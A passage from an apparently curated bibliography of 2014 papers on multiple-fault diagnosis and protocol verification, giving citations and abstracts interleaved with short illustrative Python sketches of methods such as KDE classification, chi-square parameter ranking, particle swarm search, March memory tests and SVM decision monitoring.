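from sklearn.neighbors import KernelDensity  # assumes scikit-learn

class KDEBayes:
    """Bayes classifier with class-conditional joint densities estimated
    by KDE, so feature dependence is modeled rather than assumed away as
    in naive Bayes."""

    def fit(self, X, y, bandwidth=0.5):
        self.classes_ = np.unique(y)
        self.kdes_ = {c: KernelDensity(bandwidth=bandwidth).fit(X[y == c])
                      for c in self.classes_}
        self.logpriors_ = {c: np.log(np.mean(y == c)) for c in self.classes_}
        return self

    def predict(self, X):
        # Posterior score: log p(x | c) + log p(c), maximized over classes.
        scores = np.column_stack(
            [self.kdes_[c].score_samples(X) + self.logpriors_[c]
             for c in self.classes_])
        return self.classes_[np.argmax(scores, axis=1)]

# Two correlated fault features; label 0 = fault A alone, 1 = faults A+B
rng = np.random.default_rng(0)
X = np.vstack([rng.normal(0, 1, (50, 2)), rng.normal(2, 1, (50, 2))])
y = np.array([0] * 50 + [1] * 50)
print(KDEBayes().fit(X, y).predict(np.array([[1.8, 2.1]])))
```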
  • Marcin Perzyk, Andrzej Kochanski, Jacek Kozlowski, Artur Soroczynski, Robert Biernacki, "Comparison of Data Mining Tools For Significance Analysis Of Process Parameters In Applications To Process Fault Diagnosis," Information Sciences: an International Journal, Volume 259, February, 2014, Pages 380-392. doi: 10.1016/j.ins.2013.10.019 This paper presents an evaluation of various methodologies used to determine relative significances of input variables in data-driven models. Significance analysis applied to manufacturing process parameters can be a useful tool in fault diagnosis for various types of manufacturing processes. It can also be applied to building models that are used in process control. The relative significances of input variables can be determined by various data mining methods, including relatively simple statistical procedures as well as more advanced machine learning systems. Several methodologies suitable for carrying out classification tasks which are characteristic of fault diagnosis were evaluated and compared from the viewpoint of their accuracy, robustness of results and applicability. Two types of testing data were used: synthetic data with assumed dependencies and real data obtained from the foundry industry. The simple statistical method based on contingency tables revealed the best overall performance, whereas advanced machine learning models, such as ANNs and SVMs, appeared to be of less value.
    Keywords: Data mining, Fault diagnosis, Input variable significance, Manufacturing industries (ID#:14-2208)
    URL: http://dl.acm.org/citation.cfm?id=2564929.2564988&coll=DL&dl=GUIDE&CFID=397708923&CFTOKEN=12634367 or http://dx.doi.org/10.1016/j.ins.2013.10.019
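The contingency-table method that performed best in this comparison is simple to reproduce: bin each parameter, cross-tabulate against the fault class, and rank by the chi-square statistic. A sketch assuming numpy and scipy, with invented data:

```python
import numpy as np
from scipy.stats import chi2_contingency   # assumes scipy

def rank_parameters(X, y, bins=3):
    """Rank process parameters by significance to the fault class using
    chi-square tests on contingency tables of binned values vs. labels.
    X: (samples, parameters); y: discrete fault class per sample."""
    classes = np.unique(y)
    ranking = {}
    for j in range(X.shape[1]):
        edges = np.quantile(X[:, j], np.linspace(0, 1, bins + 1)[1:-1])
        binned = np.digitize(X[:, j], edges)
        table = np.array([[np.sum((binned == b) & (y == c)) for c in classes]
                          for b in np.unique(binned)])
        chi2, p, _, _ = chi2_contingency(table)
        ranking[j] = chi2
    return sorted(ranking.items(), key=lambda kv: -kv[1])

rng = np.random.default_rng(1)
temp = rng.normal(0, 1, 200)      # parameter that actually drives the fault
noise = rng.normal(0, 1, 200)     # irrelevant parameter
y = (temp > 0.5).astype(int)
print(rank_parameters(np.column_stack([temp, noise]), y))  # temp ranks first
```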
  • Suming Chen, Arthur Choi, Adnan Darwiche, "Algorithms and Applications For The Same-Decision Probability," Journal of Artificial Intelligence Research, Volume 49 Issue 1, January 2014, Pages 601-633. (doi not provided) When making decisions under uncertainty, the optimal choices are often difficult to discern, especially if not enough information has been gathered. Two key questions in this regard relate to whether one should stop the information gathering process and commit to a decision (stopping criterion), and if not, what information to gather next (selection criterion). In this paper, we show that the recently introduced notion, Same-Decision Probability (SDP), can be useful as both a stopping and a selection criterion, as it can provide additional insight and allow for robust decision making in a variety of scenarios. This query has been shown to be highly intractable, being PP^PP-complete, and is exemplary of a class of queries which correspond to the computation of certain expectations. We propose the first exact algorithm for computing the SDP, and demonstrate its effectiveness on several real and synthetic networks. Finally, we present new complexity results, such as the complexity of computing the SDP on models with a Naive Bayes structure. Additionally, we prove that computing the non-myopic value of information is complete for the same complexity class as computing the SDP.
    Keywords: (not provided) (ID#:14-2209)
    URL: http://dl.acm.org/citation.cfm?id=2655713.2655730
  • Nithiyanantham Janakiraman, Palanisamy Nirmal Kumar, "Multi-objective Module Partitioning Design For Dynamic And Partial Reconfigurable System-On-Chip Using Genetic Algorithm," Journal of Systems Architecture: the EUROMICRO Journal, Volume 60 Issue 1, January, 2014, Pages 119-139. doi: 10.1016/j.sysarc.2013.10.001 This paper proposes a novel architecture for module partitioning problems in the process of dynamic and partial reconfigurable computing in VLSI design automation. This partitioning issue is deemed as Hypergraph replica. This can be treated by a probabilistic algorithm like the Markov chain through the transition probability matrices due to non-deterministic polynomial complete problems. This proposed technique has two levels of implementation methodology. In the first level, the combination of parallel processing of design elements and efficient pipelining techniques are used. The second level is based on the genetic algorithm optimization system architecture. This proposed methodology uses the hardware/software co-design and co-verification techniques. This architecture was verified by implementation within the MOLEN reconfigurable processor and tested on a Xilinx Virtex-5 based development board. This proposed multi-objective module partitioning design was experimentally evaluated using an ISPD'98 circuit partitioning benchmark suite. The efficiency and throughput were compared with that of the hMETIS recursive bisection partitioning approach. The results indicate that the proposed method can improve throughput and efficiency up to 39 times with only a small amount of increased design space. The proposed architecture style is sketched out and concisely discussed in this manuscript, and the existing results are compared and analyzed. (ID#:14-2210)
    URL: http://dl.acm.org/citation.cfm?id=2566270.2566391&coll=DL&dl=GUIDE&CFID=397708923&CFTOKEN=12634367 or http://dx.doi.org/10.1016/j.sysarc.2013.10.001
  • Cook, A; Wunderlich, H.-J., "Diagnosis of Multiple Faults With Highly Compacted Test Responses," Test Symposium (ETS), 2014 19th IEEE European , vol., no., pp.1,6, 26-30 May 2014. doi: 10.1109/ETS.2014.6847796 Defects cluster, and the probability of a multiple fault is significantly higher than just the product of the single fault probabilities. While this observation is beneficial for high yield, it complicates fault diagnosis. Multiple faults will occur especially often during process learning, yield ramp-up and field return analysis. In this paper, a logic diagnosis algorithm is presented which is robust against multiple faults and which is able to diagnose multiple faults with high accuracy even on compressed test responses as they are produced in embedded test and built-in self-test. The developed solution takes advantage of the linear properties of a MISR compactor to identify a set of faults likely to produce the observed faulty signatures. Experimental results show an improvement in accuracy of up to 22 % over traditional logic diagnosis solutions suitable for comparable compaction ratios.
    Keywords: built-in self test; fault diagnosis; integrated circuit testing; integrated circuit yield; probability; MISR compactor; built-in self-test; compacted test responses; compressed test responses; defects cluster; embedded test; faulty signatures; field return analysis; linear properties; logic diagnosis; multiple fault diagnosis; multiple fault probability; process learning; yield ramp-up; Accuracy; Built-in self-test; Circuit faults; Compaction; Equations; Fault diagnosis; Mathematical model; Diagnosis; Multiple Faults; Response Compaction (ID#:14-2211)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6847796&isnumber=6847779
  • Kundu, S.; Jha, A; Chattopadhyay, S.; Sengupta, I; Kapur, R., "Framework for Multiple-Fault Diagnosis Based on Multiple Fault Simulation Using Particle Swarm Optimization," Very Large Scale Integration (VLSI) Systems, IEEE Transactions on , vol.22, no.3, pp.696,700, March 2014. doi: 10.1109/TVLSI.2013.2249542 This brief proposes a framework to analyze multiple faults based on multiple fault simulation in a particle swarm optimization environment. Experimentation shows that up to ten faults can be diagnosed in a reasonable time. However, the scheme does not put any restriction on the number of simultaneous faults.
    Keywords: fault simulation; integrated circuit testing; particle swarm optimisation; multiple fault diagnosis; multiple fault simulation; particle swarm optimization; Automatic test pattern generation (ATPG);effect-cause analysis ;fault diagnosis; multiple fault injection; particle swarm optimization (PSO) (ID#:14-2212)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6488883&isnumber=6746074
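A binary-encoded PSO of the kind the brief describes can be sketched concisely: each particle is a candidate set of simultaneous faults, and fitness counts mismatches between observed and simulated test responses. In the stand-in below, a Hamming-distance fitness replaces the fault simulator, and all parameters are illustrative.

```python
import math
import random

def pso_diagnose(n_sites, fitness, swarm=20, iters=100):
    """Binary PSO over candidate multiple-fault sets (0/1 vectors over
    suspect fault sites); lower fitness means a better response match."""
    rand_bits = lambda: [random.randint(0, 1) for _ in range(n_sites)]
    pos = [rand_bits() for _ in range(swarm)]
    vel = [[0.0] * n_sites for _ in range(swarm)]
    pbest = [p[:] for p in pos]
    gbest = min(pbest, key=fitness)
    for _ in range(iters):
        for i in range(swarm):
            for d in range(n_sites):
                vel[i][d] += (2 * random.random() * (pbest[i][d] - pos[i][d]) +
                              2 * random.random() * (gbest[d] - pos[i][d]))
                vel[i][d] = max(-6.0, min(6.0, vel[i][d]))  # keep sigmoid sane
                prob = 1.0 / (1.0 + math.exp(-vel[i][d]))
                pos[i][d] = 1 if random.random() < prob else 0
            if fitness(pos[i]) < fitness(pbest[i]):
                pbest[i] = pos[i][:]
        gbest = min(pbest + [gbest], key=fitness)
    return gbest

true_faults = [1, 0, 0, 1, 0, 1, 0, 0]          # three simultaneous faults
mismatch = lambda cand: sum(a != b for a, b in zip(cand, true_faults))
print(pso_diagnose(8, mismatch))                 # typically recovers true_faults
```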
  • Cheng-Hung Wu; Kuen-Jong Lee; Wei-Cheng Lien, "An Efficient Diagnosis Method To Deal With Multiple Fault-Pairs Simultaneously Using A Single Circuit Model," VLSI Test Symposium (VTS), 2014 IEEE 32nd , vol., no., pp.1,6, 13-17 April 2014. doi: 10.1109/VTS.2014.6818790 This paper proposes an efficient diagnosis-aware ATPG method that can quickly identify equivalent-fault pairs and generate diagnosis patterns for nonequivalent-fault pairs, where an (non)equivalent-fault pair contains two stuck-at faults that are (not) equivalent. A novel fault injection method is developed which allows one to embed all fault pairs undistinguished by the conventional test patterns into a circuit model with only one copy of the original circuit. Each pair of faults to be processed is transformed to a stuck-at fault and all fault pairs can be dealt with by invoking an ordinary ATPG tool for stuck-at faults just once. High efficiency of diagnosis pattern generation can be achieved due to 1) the circuit to be processed is read only once, 2) the data structure for ATPG process is constructed only once, 3) multiple fault pairs can be processed at a time, and 4) only one copy of the original circuit is needed. Experimental results show that this is the first reported work that can achieve 100% diagnosis resolutions for all ISCAS'89 and IWLS'05 benchmark circuits using an ordinary ATPG tool. Furthermore, we also find that the total number of patterns required to deal with all fault pairs in our method is smaller than that of the current state-of-the-art work.
    Keywords: automatic test pattern generation; fault diagnosis;ISCAS'89 benchmark circuit;IWLS'05 benchmark circuit; automatic test pattern generation; diagnosis pattern generation; diagnosis-aware ATPG method; fault injection; fault pairs diagnosis; nonequivalent-fault pairs; single circuit model; stuck-at faults; Automatic test pattern generation; Central Processing Unit;Circuit faults; Fault diagnosis; Integrated circuit modeling; Logic gates; Multiplexing; Fault diagnosis; diagnosis pattern generation;multi-pair diagnosis (ID#:14-2213)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6818790&isnumber=6818727
  • Zhao, Chunhui, "Fault subspace selection and analysis of relative changes based reconstruction modeling for multi-fault diagnosis," Control and Decision Conference (2014 CCDC), The 26th Chinese , vol., no., pp.235,240, May 31 2014-June 2 2014. doi: 10.1109/CCDC.2014.6852151 Online fault diagnosis has been a crucial task for industrial processes. Reconstruction-based fault diagnosis has been drawing special attentions as a good alternative to the traditional contribution plot. It identifies the fault cause by finding the specific fault subspace that can well eliminate alarming signals from a bunch of alternatives that have been prepared based on historical fault data. However, in practice, the abnormality may result from the joint effects of multiple faults, which thus can not be well corrected by single fault subspace archived in the historical fault library. In the present work, an aggregative reconstruction-based fault diagnosis strategy is proposed to handle the case where multiple fault causes jointly contribute to the abnormal process behaviors. First, fault subspaces are extracted based on historical fault data in two different monitoring subspaces where analysis of relative changes is taken to enclose the major fault effects that are responsible for different alarming monitoring statistics. Then, a fault subspace selection strategy is developed to analyze the combinatorial fault nature which will sort and select the informative fault subspaces that are most likely to be responsible for the concerned abnormalities. Finally, an aggregative fault subspace is calculated by combining the selected fault subspaces which represents the joint effects from multiple faults and works as the final reconstruction model for online fault diagnosis. Theoretical support is framed and the related statistical characteristics are analyzed. Its feasibility and performance are illustrated with simulated multi-faults using data from the Tennessee Eastman (TE) benchmark process.
    Keywords: Analytical models; Data models; Fault diagnosis; Joints; Libraries; Monitoring; Principal component analysis; analysis of relative changes; fault subspace selection; joint fault effects; multi-fault diagnosis; reconstruction modeling (ID#:14-2214)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6852151&isnumber=6852105
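The reconstruction step underlying this family of methods is compact: correct the sample along a candidate fault subspace so that the squared prediction error (SPE) of a PCA model is minimized; a subspace that collapses the alarm is implicated. A numpy sketch with invented dimensions and directions:

```python
import numpy as np   # assumes numpy

def spe(x, P):
    """Squared prediction error of sample x against a PCA model whose
    retained loadings are the columns of P."""
    resid = x - P @ (P.T @ x)
    return float(resid @ resid)

def reconstruct(x, P, Xi):
    """Correct x along the fault subspace Xi (columns = fault directions)
    so that the remaining SPE is minimized."""
    project = lambda v: v - P @ (P.T @ v)        # residual-space projector
    f, *_ = np.linalg.lstsq(project(Xi), project(x), rcond=None)
    return x - Xi @ f

rng = np.random.default_rng(3)
P, _ = np.linalg.qr(rng.normal(size=(5, 2)))     # toy PCA loadings
Xi = np.eye(5)[:, [0]]                           # candidate: sensor-0 bias
x_faulty = rng.normal(size=5) * 0.1 + 4.0 * Xi[:, 0]
print(spe(x_faulty, P), spe(reconstruct(x_faulty, P, Xi), P))  # SPE drops
```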
  • Liu, K.; Ma, Q.; Gong, W.; Miao, X.; Liu, Y., "Self-Diagnosis for Large Scale Wireless Sensor Networks," Wireless Communications, IEEE Transactions on, vol. PP, no.99, pp.1, 1, July 2014. doi: 10.1109/TWC.2014.2336653 Existing approaches to diagnosing sensor networks are generally sink-based, relying on actively pulling state information from sensor nodes so as to conduct centralized analysis. First, sink-based tools incur huge communication overhead on traffic-sensitive sensor networks. Second, due to unreliable wireless communications, the sink often obtains incomplete and suspicious information, leading to inaccurate judgments. Even worse, it is always more difficult to obtain state information from problematic or critical regions. To address the above issues, we present a novel self-diagnosis approach, which encourages each single sensor to join the fault decision process. We design a series of fault detectors through which multiple nodes can cooperate with each other in a diagnosis task. Fault detectors encode the diagnosis process as state transitions. Each sensor can participate in the diagnosis by transiting the detector's current state to a new one based on local evidence and then passing the detector to other nodes. Given sufficient evidence, the fault detector reaches the Accept state and outputs the final diagnosis report. We examine the performance of our self-diagnosis tool, called TinyD2, on a 100-node indoor testbed and conduct field studies in the GreenOrbs system, an operational sensor network with 330 nodes outdoors.
    Keywords: Debugging; Detectors; Fault detection; Fault diagnosis; Measurement; Wireless communication; Wireless sensor networks (ID#:14-2215)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6850017&isnumber=4656680
  • Kannan, S.; Karimi, N.; Karri, R.; Sinanoglu, O., "Detection, Diagnosis, And Repair Of Faults In Memristor-Based Memories," VLSI Test Symposium (VTS), 2014 IEEE 32nd , vol., no., pp.1,6, 13-17 April 2014. doi: 10.1109/VTS.2014.6818762 Memristors are an attractive option for use in future memory architectures due to their non-volatility, high density and low power operation. Notwithstanding these advantages, memristors and memristor-based memories are prone to high defect densities due to the non-deterministic nature of nanoscale fabrication. The typical approach to fault detection and diagnosis in memories entails testing one memory cell at a time. This is time consuming and does not scale for the dense, memristor-based memories. In this paper, we integrate solutions for detecting and locating faults in memristors, and ensure post-silicon recovery from memristor failures. We propose a hybrid diagnosis scheme that exploits sneak-paths inherent in crossbar memories, and uses March testing to test and diagnose multiple memory cells simultaneously, thereby reducing test time. We also provide a repair mechanism that prevents faults in the memory from being activated. The proposed schemes enable and leverage sneak paths during fault detection and diagnosis modes, while still maintaining a sneak-path free crossbar during normal operation. The proposed hybrid scheme reduces fault detection and diagnosis time by ~44%, compared to traditional March tests, and repairs the faulty cell with minimal overhead.
    Keywords: fault diagnosis; memristors; random-access storage; March testing; crossbar memories; fault detection; fault diagnosis; faulty cell repairs; future memory architectures; high defect densities; hybrid diagnosis scheme; memristor failures; memristor-based memories; multiple memory cells testing; nanoscale fabrication; post-silicon recovery; sneak-path free crossbar; test time; Circuit faults; Fault detection; Integrated circuits; Maintenance engineering; Memristors; Resistance; Testing; Memory; Memristor; Sneak-paths; Testing (ID#:14-2216)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6818762&isnumber=6818727
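The March-test basis that the hybrid scheme builds on is easy to state in code: a fixed sequence of read-expected/write elements swept up and down the address space. The sketch below runs March C- against a simulated memory with two injected stuck-at faults; the paper's actual contribution, exploiting sneak-paths to test many memristor cells at once, is not modeled here.

```python
def march_c_minus(mem_read, mem_write, n):
    """March C-: up(w0); up(r0,w1); up(r1,w0); down(r0,w1); down(r1,w0);
    up(r0). Returns the addresses whose observed value disagrees with
    the expected one."""
    faults = set()
    def element(addrs, expect, write_val):
        for a in addrs:
            if expect is not None and mem_read(a) != expect:
                faults.add(a)
            if write_val is not None:
                mem_write(a, write_val)
    up, down = range(n), range(n - 1, -1, -1)
    element(up, None, 0)
    element(up, 0, 1)
    element(up, 1, 0)
    element(down, 0, 1)
    element(down, 1, 0)
    element(up, 0, None)
    return faults

# Simulated 16-cell memory: cell 5 stuck at 1, cell 9 stuck at 0
mem = [0] * 16
def read(a): return 1 if a == 5 else (0 if a == 9 else mem[a])
def write(a, v): mem[a] = v
print(march_c_minus(read, write, 16))   # detects both faults: {5, 9}
```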
  • Xin Xia; Yang Feng; Lo, D.; Zhenyu Chen; Xinyu Wang, "Towards More Accurate Multi-Label Software Behavior Learning," Software Maintenance, Reengineering and Reverse Engineering (CSMR-WCRE), 2014 Software Evolution Week - IEEE Conference on , vol., no., pp.134,143, 3-6 Feb. 2014. doi: 10.1109/CSMR-WCRE.2014.6747163 In a modern software system, when a program fails, a crash report which contains an execution trace is sent to the software vendor for diagnosis. A crash report which corresponds to a failure could be caused by multiple types of faults simultaneously. Many large companies such as Baidu organize a team to analyze these failures, and classify them into multiple labels (i.e., multiple types of faults). However, it would be time-consuming and difficult for developers to manually analyze these failures and come up with appropriate fault labels. In this paper, we automatically classify a failure into multiple types of faults, using a composite algorithm named MLL-GA, which combines various multi-label learning algorithms by leveraging a genetic algorithm (GA). To evaluate the effectiveness of MLL-GA, we perform experiments on 6 open source programs and show that MLL-GA achieves average F-measures of 0.6078 to 0.8665. We also compare our algorithm with ML.KNN and show that on average across the 6 datasets, MLL-GA improves the average F-measure of ML.KNN by 14.43%.
    Keywords: genetic algorithms ;learning (artificial intelligence);public domain software; software fault tolerance; software maintenance; Baidu;F-measures; MLL-GA;Ml. KNN; crash report; execution trace; fault labels; genetic algorithm; modern software system; multilabel software behavior learning; open source programs; software vendor; Biological cells; Computer crashes; Genetic algorithms; Prediction algorithms; Software; Software algorithms; Training; Genetic Algorithm; Multi-label Learning; Software Behavior Learning (ID#:14-2217)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6747163&isnumber=6747152
  • Sun, J.; Liao, H.; Upadhyaya, B.R., "A Robust Functional-Data-Analysis Method for Data Recovery in Multichannel Sensor Systems," Cybernetics, IEEE Transactions on , vol.44, no.8, pp.1420,1431, Aug. 2014. doi: 10.1109/TCYB.2013.2285876 Multichannel sensor systems are widely used in condition monitoring for effective failure prevention of critical equipment or processes. However, loss of sensor readings due to malfunctions of sensors and/or communication has long been a hurdle to reliable operations of such integrated systems. Moreover, asynchronous data sampling and/or limited data transmission are usually seen in multiple sensor channels. To reliably perform fault diagnosis and prognosis in such operating environments, a data recovery method based on functional principal component analysis (FPCA) can be utilized. However, traditional FPCA methods are not robust to outliers and their capabilities are limited in recovering signals with strongly skewed distributions (i.e., lack of symmetry). This paper provides a robust data-recovery method based on functional data analysis to enhance the reliability of multichannel sensor systems. The method not only considers the possibly skewed distribution of each channel of signal trajectories, but is also capable of recovering missing data for both individual and correlated sensor channels with asynchronous data that may be sparse as well. In particular, grand median functions, rather than classical grand mean functions, are utilized for robust smoothing of sensor signals. Furthermore, the relationship between the functional scores of two correlated signals is modeled using multivariate functional regression to enhance the overall data-recovery capability. An experimental flow-control loop that mimics the operation of coolant-flow loop in a multimodular integral pressurized water reactor is used to demonstrate the effectiveness and adaptability of the proposed data-recovery method. The computational results illustrate that the proposed method is robust to outliers and more capable than the existing FPCA-based method in terms of the accuracy in recovering strongly skewed signals. In addition, turbofan engine data are also analyzed to verify the capability of the proposed method in recovering non-skewed signals.
    Keywords: Bandwidth; Data models; Eigenvalues and eigenfunctions; Predictive models; Robustness; Sensor systems; Sun; Asynchronous data; condition monitoring; data recovery; robust functional principal component analysis (ID#:14-2218)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6670785&isnumber=6856256
  • Simon, S.; Liu, S., "An Automated Design Method for Fault Detection and Isolation of Multidomain Systems Based on Object-Oriented Models," Mechatronics, IEEE/ASME Transactions on, vol. PP, no.99, pp. 1, 13, July 2014. doi: 10.1109/TMECH.2014.2330904 In this paper, it is shown that the high automation level of the object-oriented modeling paradigm for physical systems can significantly rationalize the design procedure of fault detection and isolation (FDI) systems. Consequently, an object-oriented FDI method for complex engineering systems consisting of subsystems from different physical domains like mechatronic systems, commercial vehicles, and chemical process plants is developed. The mathematical composition of the objects corresponding to the subsystems results in a differential algebraic equation (DAE) that describes the overall system. This DAE is automatically analyzed and transferred into a set of residual generators that enable a two-stage FDI procedure for multiple fault modes.
    Keywords: Automated design of fault detection and isolation (FDI) systems; model-based diagnosis; object-oriented modeling of multidomain systems (ID#:14-2219)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6857410&isnumber=4785241
  • Mehdi Namdari, Hooshang Jazayeri-Rad, "Incipient Fault Diagnosis Using Support Vector Machines Based On Monitoring Continuous Decision Functions," Engineering Applications of Artificial Intelligence, Volume 28, February, 2014, Pages 22-35. doi: 10.1016/j.engappai.2013.11.013 Support Vector Machine (SVM) as an innovative machine learning tool, based on statistical learning theory, is recently used in process fault diagnosis tasks. In the application of SVM to a fault diagnosis problem, typically a discrete decision function with discrete output values is utilized in order to solely define the label of the fault. However, for incipient faults in which fault steadily progresses over time and there is a changeover from normal operation to faulty operation, using discrete decision function does not reveal any evidence about the progress and depth of the fault. Numerous process faults, such as the reactor fouling and degradation of catalyst, progress slowly and can be categorized as incipient faults. In this work a continuous decision function is anticipated. The decision function values not only define the fault label, but also give qualitative evidence about the depth of the fault. The suggested method is applied to incipient fault diagnosis of a continuous binary mixture distillation column and the result proves the practicability of the proposed approach. In incipient fault diagnosis tasks, the proposed approach outperformed some of the conventional techniques. Moreover, the performance of the proposed approach is better than typical discrete based classification techniques employing some monitoring indexes such as the false alarm rate, detection time and diagnosis time.
    Keywords: Binary mixture distillation column, Continuous decision function, Incipient fault diagnosis, Pattern recognition, Support vector machines (ID#:14-2220)
    URL: http://dl.acm.org/citation.cfm?id=2574578.2574707&coll=DL&dl=GUIDE&CFID=397708923&CFTOKEN=12634367 or http://dx.doi.org/10.1016/j.engappai.2013.11.013
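The monitoring idea here is simply to track the classifier's continuous decision value rather than its sign. With scikit-learn (an editor's assumption; the paper does not prescribe a library), SVC's decision_function exposes exactly this quantity, and its drift toward the fault side indicates how deep the degradation has progressed. All data below are synthetic.

```python
import numpy as np
from sklearn.svm import SVC   # assumes scikit-learn

# Train on normal data vs. fully developed fault data
rng = np.random.default_rng(2)
X = np.vstack([rng.normal(0, 0.3, (100, 2)), rng.normal(2, 0.3, (100, 2))])
y = np.array([0] * 100 + [1] * 100)
clf = SVC(kernel="rbf").fit(X, y)

# Simulate an incipient fault: the operating point drifts slowly from the
# normal region toward the fault region over 21 time steps.
trajectory = np.array([[0.1 * t, 0.1 * t] for t in range(21)])
for t, value in enumerate(clf.decision_function(trajectory)):
    # The continuous value crosses zero gradually, revealing fault depth
    # long before the discrete label would change.
    print(f"t={t:2d}  decision value={value:+.2f}")
```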

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Protocol Verification

Protocol Verification


Verifying the accuracy of security protocols is a primary goal of cybersecurity. Research into the area has sought to identify new and better algorithms and to identify better methods for verifying security protocols in myriad applications and environments. The papers presented here are from the first half of 2014.

  • Rui Zhou; Rong Min; Qi Yu; Chanjuan Li; Yong Sheng; Qingguo Zhou; Xuan Wang; Kuan-Ching Li, "Formal Verification of Fault-Tolerant and Recovery Mechanisms for Safe Node Sequence Protocol," Advanced Information Networking and Applications (AINA), 2014 IEEE 28th International Conference on , vol., no., pp.813,820, 13-16 May 2014. doi: 10.1109/AINA.2014.99 Fault-tolerance has a huge impact on embedded safety-critical systems, and the Safe Node Sequence Protocol (SNSP) is designed as a technology that contributes part of that impact. In this paper, we present a mechanism for fault-tolerance and recovery based on the Safe Node Sequence Protocol (SNSP) to strengthen system robustness, from which the correctness of a fault-tolerant prototype system is analyzed and verified. In order to verify the correctness of more than thirty failure modes, we have partitioned the complete protocol state machine into several subsystems, followed by the injection of corresponding fault classes into dedicated independent models. Experiments demonstrate that this method effectively reduces the size of the overall state space, and verification results indicate that the protocol is able to recover from the fault model in a fault-tolerant system and continue to operate as errors occur.
    Keywords: fault tolerance; formal verification; protocols; SNSP; failure modes; fault classes; fault model; fault-tolerant prototype system; fault-tolerant system; formal verification; machine; protocol state machine; recovery mechanisms; safe node sequence protocol; Fault tolerant systems; Model checking; Protocols; Real-time systems; Redundancy; Tunneling magnetoresistance; Safe Node Sequence Protocol; event-triggered protocol; fault-tolerance; model checking (ID#:14-2221)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6838748&isnumber=6838626
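The verification style used here, exhaustively exploring a protocol state machine with injected fault classes, can be miniaturized to a few lines of explicit-state search. The toy recovery protocol below is an editor's invention to show the mechanics, not the SNSP model itself.

```python
from collections import deque

def explore(init, step, safe):
    """Explicit-state model checking: breadth-first search over all
    reachable states, returning a state that violates `safe`, or None
    if the property holds everywhere."""
    seen, queue = {init}, deque([init])
    while queue:
        state = queue.popleft()
        if not safe(state):
            return state
        for nxt in step(state):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return None

# Toy node model: a fault event may push the node into 'error' mode; each
# recovery attempt either succeeds or increments the retry counter.
def step(state):
    mode, retries = state
    if mode == "ok":
        return {("ok", 0), ("error", 0)}               # fault injection
    if retries < 3:
        return {("ok", 0), ("error", retries + 1)}     # recovery attempt
    return {("error", retries)}                        # gave up

violation = explore(("ok", 0), step, safe=lambda s: s[1] <= 3)
print("property holds" if violation is None else f"counterexample: {violation}")
```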
  • Meng Zhang; Bingham, J.D.; Erickson, J.; Sorin, D.J., "PVCoherence: Designing Flat Coherence Protocols For Scalable Verification," High Performance Computer Architecture (HPCA), 2014 IEEE 20th International Symposium on , vol., no., pp.392,403, 15-19 Feb. 2014. doi: 10.1109/HPCA.2014.6835949 The goal of this work is to design cache coherence protocols with many cores that can be verified with state-of-the-art automated verification methodologies. In particular, we focus on flat (non-hierarchical) coherence protocols, and we use a mostly-automated methodology based on parametric verification (PV). We propose several design guidelines that architects should follow if they want to design protocols that can be parametrically verified. We experimentally evaluate performance, storage overhead, and scalability of a protocol verified with PV compared to a highly optimized protocol that cannot be verified with PV.
    Keywords: cache storage; formal verification; memory protocols; PVCoherence; automated verification methodology; cache coherence protocol; flat coherence protocol; parametric verification; scalable verification; storage overhead; Coherence; Concrete; Guidelines; Manuals; Model checking; Parametric statistics; Protocols (ID#:14-2222)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6835949&isnumber=6835920
  • Kasraoui, M.; Cabani, A; Chafouk, H., "Formal Verification of Wireless Sensor Key Exchange Protocol Using AVISPA," Computer, Consumer and Control (IS3C), 2014 International Symposium on , vol., no., pp.387,390, 10-12 June 2014. doi: 10.1109/IS3C.2014.107 For efficient deployment of the sensor nodes required in many logistic applications, it is necessary to build security mechanisms for secure wireless communication. End-to-end security plays a crucial role in the communication of these networks, providing confidentiality, authentication and, above all, prevention against many attacks at a high level. In this paper, we propose a lightweight key exchange protocol, WSKE (Wireless Sensor Key Exchange), for IP-based wireless sensor networks. This protocol proposes techniques that adapt the IKEv2 (Internet Key Exchange version 2) mechanisms of IPSEC/6LoWPAN networks. In order to check these security properties, we have used a formal verification tool called AVISPA.
    Keywords: IP networks; Internet; cryptographic protocols; formal verification; wireless sensor networks; AVISPA; IKEv2; IP-based wireless sensor networks; IPSEC-6LoWPAN networks; Internet key exchange version 2 mechanism; end-to-end security; formal verification; lightweight key exchange protocol WSKE; wireless sensor key exchange protocol; Authentication; Communication system security; Internet; Protocols; Wireless communication; Wireless sensor networks; IKEv2; IPSec; Security; WSNs (ID#:14-2223)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6845899&isnumber=6845429
  • Sumec, S., "Software Tool For Verification Of Sampled Values Transmitted Via IEC 61850-9-2 Protocol," Electric Power Engineering (EPE), Proceedings of the 2014 15th International Scientific Conference on, vol., no., pp.113,117, 12-14 May 2014. doi: 10.1109/EPE.2014.6839413 Process buses are increasingly used for communication between equipment in substations. In addition to signaling various device statuses using GOOSE messages, it is possible to transmit measured values, which can be used for system diagnostics or other advanced functions. Transmission of such values via Ethernet is well defined in the protocol IEC 61850-9-2. This paper introduces a tool designed for verification of the sampled values generated by various devices using this protocol.
    Keywords: IEC standards; local area networks; power engineering computing; protocols; substation protection; system buses; Ethernet; GOOSE messages; IEC 61850-9-2 protocol; process bus; software protection system; software tool; substations; Current measurement; Data visualization; Decoding; IEC standards; Merging; Protocols; Ethernet; sampled values; substation (ID#:14-2224)
